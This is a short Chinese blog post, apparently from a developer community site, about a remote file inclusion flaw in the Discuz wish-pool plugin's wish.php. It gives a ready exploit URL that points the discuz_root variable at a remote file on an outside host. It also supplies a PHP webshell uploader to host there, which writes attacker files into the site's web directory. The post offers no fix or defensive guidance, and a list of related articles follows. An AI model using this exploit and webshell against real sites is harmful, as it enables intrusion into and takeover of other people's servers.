discuz许愿池插件远程包含漏洞

Python芸芸

 关注

阅读 169

2022-04-05

许愿池插件的wish.php文件出的问题:

require $discuz_root.'./include/discuzcode.func.php';


手工利用方法:

远程包含漏洞,变量discuz_root过滤不严,利用方法:

http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?

不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。

这里xxxx.txt用CN.Tink的那个小马写个shell进去:

<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>

<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">

<input NAME="MyFile" TYPE="file">

<input VALUE=" 提交 " TYPE="submit">

</form>

相关推荐

Discuz插件,批量Discuz采集发布插件

木匠0819 139 0 0

文件包含漏洞

松鼠树屋 148 0 0

分享Discuz! X2插件嵌入点列表(包含门户、社区、群组等)

佛贝鲁先生 122 0 0

★文件包含漏洞

杏花疏影1 209 0 0

【网络安全 --- 文件包含漏洞】文件包含漏洞详解

流计算Alink 21 0 0

文件包含漏洞讲解

Gascognya 20 0 0

文件包含漏洞与文件读取漏洞

快乐小码农 150 0 0

discuz制作插件备忘录

伊人幽梦 112 0 0

文件包含漏洞汇总

阿尚青子自由写作人 24 0 0

文件包含漏洞学习

七千22 109 0 0

精彩评论(0)

0 0 举报